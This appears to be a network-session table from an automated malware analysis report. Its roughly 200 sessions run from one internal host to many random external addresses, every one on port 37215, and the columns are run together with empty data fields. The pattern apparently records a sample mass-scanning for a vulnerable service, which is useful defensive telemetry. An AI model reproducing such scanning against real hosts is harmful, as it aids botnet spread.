                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8512192.168.2.153759241.230.228.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8513192.168.2.154655441.74.73.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8514192.168.2.154716841.37.181.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8515192.168.2.153558041.197.70.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8516192.168.2.155566441.109.215.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8517192.168.2.153309441.24.228.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8518192.168.2.153589041.18.199.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8519192.168.2.153983441.197.75.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8520192.168.2.154697241.99.254.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8521192.168.2.154822641.86.77.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8522192.168.2.155835841.69.77.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8523192.168.2.154519841.150.70.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8524192.168.2.155613441.247.66.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8525192.168.2.155618641.166.11.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8526192.168.2.155923241.222.42.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8527192.168.2.155922041.130.187.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8528192.168.2.155659041.203.121.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8529192.168.2.155767041.105.37.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8530192.168.2.155046441.43.223.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8531192.168.2.155732641.11.59.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8532192.168.2.154956841.110.18.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8533192.168.2.155449841.105.67.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8534192.168.2.155742041.202.192.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8535192.168.2.154133241.189.37.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8536192.168.2.155405441.61.185.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8537192.168.2.155615441.44.183.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8538192.168.2.154293841.60.246.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8539192.168.2.153761641.76.111.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8540192.168.2.153278241.43.95.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8541192.168.2.1554250156.167.15.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8542192.168.2.1539914156.238.91.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8543192.168.2.1533984156.8.113.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8544192.168.2.1557924156.90.163.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8545192.168.2.1553038156.131.107.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8546192.168.2.1548106156.254.135.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8547192.168.2.1556562156.180.125.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8548192.168.2.1557756156.3.56.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8549192.168.2.1558902156.100.156.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8550192.168.2.1536310156.122.53.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8551192.168.2.1556664156.220.110.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8552192.168.2.1550478156.115.144.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8553192.168.2.1543706156.2.186.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8554192.168.2.1539992156.69.45.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8555192.168.2.1536988156.82.0.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8556192.168.2.1537608156.247.220.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8557192.168.2.1538516156.116.249.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8558192.168.2.1545102156.146.124.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8559192.168.2.1559908156.215.242.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8560192.168.2.1560570156.79.189.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8561192.168.2.1544132156.247.231.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8562192.168.2.1541502156.25.45.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8563192.168.2.1556040156.155.8.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8564192.168.2.1549026156.216.137.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8565192.168.2.1539492156.58.129.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8566192.168.2.1549712156.219.248.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8567192.168.2.1560342156.70.39.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8568192.168.2.1539428156.75.218.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8569192.168.2.1555822156.168.167.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8570192.168.2.1540564156.162.25.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8571192.168.2.1533280156.48.29.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8572192.168.2.1550610156.116.82.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8573192.168.2.1547238156.129.79.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8574192.168.2.1549942156.202.167.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8575192.168.2.1539338156.124.206.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8576192.168.2.1541136156.67.29.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8577192.168.2.1546630156.169.197.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8578192.168.2.1560470156.16.95.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8579192.168.2.1542902156.155.99.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8580192.168.2.1533820156.238.190.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8581192.168.2.1547482156.165.157.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8582192.168.2.1548634156.254.69.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8583192.168.2.1560680156.229.69.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8584192.168.2.1536410156.128.251.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8585192.168.2.1541632156.88.5.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8586192.168.2.1550180156.8.127.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8587192.168.2.1549180156.93.184.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8588192.168.2.1535070156.34.227.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8589192.168.2.1553378156.30.97.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8590192.168.2.1543398156.168.54.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8591192.168.2.1559016156.190.223.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8592192.168.2.1552990156.200.29.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8593192.168.2.1559554156.30.7.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8594192.168.2.1554848156.168.252.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8595192.168.2.1557170156.142.196.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8596192.168.2.1533202156.254.241.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8597192.168.2.1549398156.46.173.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8598192.168.2.1540224156.178.104.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8599192.168.2.1552536156.212.152.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8600192.168.2.1533304156.53.182.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8601192.168.2.1553848156.101.33.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8602192.168.2.1559812156.43.45.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8603192.168.2.1536146156.200.189.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8604192.168.2.1558428156.211.175.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8605192.168.2.1560258156.32.195.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8606192.168.2.1545294156.46.126.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8607192.168.2.1539980156.208.126.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8608192.168.2.1541882156.247.243.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8609192.168.2.1549124156.8.241.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8610192.168.2.1556036156.114.188.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8611192.168.2.1555074156.117.202.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8612192.168.2.1560992156.170.195.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8613192.168.2.1547012156.11.24.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8614192.168.2.1537218156.79.151.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8615192.168.2.1548692156.213.0.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8616192.168.2.1555082156.20.52.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8617192.168.2.1544672156.85.175.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8618192.168.2.1560486156.125.239.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8619192.168.2.1545340156.63.88.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8620192.168.2.1560008156.248.215.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8621192.168.2.1557944156.137.30.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8622192.168.2.1535346156.87.53.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8623192.168.2.1560676156.181.13.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8624192.168.2.1538290156.224.152.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8625192.168.2.1555626156.141.107.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8626192.168.2.1540188156.164.126.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8627192.168.2.1543410156.212.176.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8628192.168.2.1545408156.83.89.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8629192.168.2.1553744156.240.1.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8630192.168.2.1556716156.96.163.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8631192.168.2.1553762156.113.89.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8632192.168.2.1549890156.44.156.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8633192.168.2.1533188156.92.147.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8634192.168.2.1557736156.56.220.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8635192.168.2.1540108156.222.58.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8636192.168.2.1556062156.191.152.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8637192.168.2.1551314156.247.4.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8638192.168.2.1538606156.76.158.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8639192.168.2.1549968156.220.180.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8640192.168.2.1560702156.67.29.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8641192.168.2.1538462156.101.147.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8642192.168.2.1552530156.52.194.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8643192.168.2.1540220156.151.29.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8644192.168.2.1534682156.180.157.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8645192.168.2.1553526156.201.151.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8646192.168.2.1560548156.84.96.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8647192.168.2.1542664156.240.97.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8648192.168.2.1542392156.18.214.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8649192.168.2.1550502156.65.152.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8650192.168.2.1537096156.11.255.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8651192.168.2.1536668156.26.11.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8652192.168.2.1556832156.125.188.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8653192.168.2.1559706156.3.178.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8654192.168.2.1545652156.7.241.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8655192.168.2.1546572156.164.254.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8656192.168.2.1551638156.216.239.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8657192.168.2.1544620156.26.251.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8658192.168.2.1560274156.30.27.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8659192.168.2.1547590156.93.43.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8660192.168.2.1552766156.16.207.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8661192.168.2.1549238156.188.230.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8662192.168.2.1558100156.19.143.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8663192.168.2.1551072156.41.36.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8664192.168.2.1553978156.203.162.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8665192.168.2.1540852156.53.182.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8666192.168.2.1547696156.112.221.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8667192.168.2.1549620156.91.30.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8668192.168.2.1547608156.146.250.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8669192.168.2.1541892156.162.141.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8670192.168.2.1549044156.137.25.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8671192.168.2.1546248156.250.255.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8672192.168.2.1539750156.134.36.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8673192.168.2.1557240156.153.78.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8674192.168.2.1556276156.151.78.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8675192.168.2.1539138156.255.205.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8676192.168.2.1557234156.65.145.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8677192.168.2.1555320156.162.96.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8678192.168.2.1533976156.16.33.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8679192.168.2.1551476156.240.88.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8680192.168.2.1548068156.119.161.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8681192.168.2.1539616156.88.249.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8682192.168.2.1549114156.61.166.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8683192.168.2.1544958156.2.72.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8684192.168.2.1536044156.77.27.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8685192.168.2.1555508156.154.40.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8686192.168.2.1542948156.171.146.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8687192.168.2.1556266156.138.131.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8688192.168.2.1558518156.15.182.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8689192.168.2.1546518156.201.55.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8690192.168.2.1560386156.119.109.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8691192.168.2.1550120156.32.60.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8692192.168.2.1547834156.95.252.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8693192.168.2.1550274156.48.165.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8694192.168.2.1549294156.53.135.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8695192.168.2.1555900156.16.175.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8696192.168.2.1560268156.122.239.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8697192.168.2.1544002156.165.133.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8698192.168.2.1544968156.98.127.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8699192.168.2.1545640156.85.115.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8700192.168.2.1543806156.40.217.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8701192.168.2.1545018156.161.169.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8702192.168.2.1558252156.244.76.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8703192.168.2.1535782156.238.89.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8704192.168.2.1553820156.152.98.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8705192.168.2.1553642156.25.106.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8706192.168.2.1556526156.89.205.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8707192.168.2.1560884156.47.233.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8708192.168.2.1555646156.104.150.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8709192.168.2.1554944156.146.49.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8710192.168.2.1542124156.177.13.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8711192.168.2.1547674156.195.42.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
